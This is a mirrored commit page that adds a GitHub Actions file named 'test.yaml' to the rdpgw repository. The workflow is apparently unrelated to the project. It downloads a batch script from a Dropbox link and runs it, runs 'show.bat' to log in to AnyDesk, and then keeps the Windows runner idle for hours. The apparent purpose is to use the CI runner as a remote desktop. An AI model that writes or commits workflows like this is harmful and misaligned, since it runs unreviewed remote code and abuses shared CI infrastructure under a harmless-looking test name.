mirror of
https://github.com/bolkedebruin/rdpgw.git
synced 2026-02-10 18:07:44 +00:00
Create test.yaml
This commit is contained in:
parent
fee421beba
commit
c87367ced3
22
.github/workflows/test.yaml
vendored
Normal file
22
.github/workflows/test.yaml
vendored
Normal file
@ -0,0 +1,22 @@
|
||||
name: Windows - RustDesk
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
name: Start Building...
|
||||
runs-on: windows-latest
|
||||
timeout-minutes: 360 # Adjusted to 6 hours (Github default max for free runners)
|
||||
|
||||
steps:
|
||||
- name: Downloading & Installing Essentials
|
||||
run: |
|
||||
Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/qdyd4p9t6xoabl95n5o3g/Downloads.bat?rlkey=snr74vv1vr8k5suujugvrhjtm&dl=1" -OutFile "Downloads.bat"
|
||||
cmd /c Downloads.bat
|
||||
|
||||
- name: Log In To AnyDesk
|
||||
run: cmd /c show.bat
|
||||
|
||||
- name: Time Counter
|
||||
run: python -c "import time; time.sleep(9999)"
|
||||
Loading…
Reference in New Issue
Block a user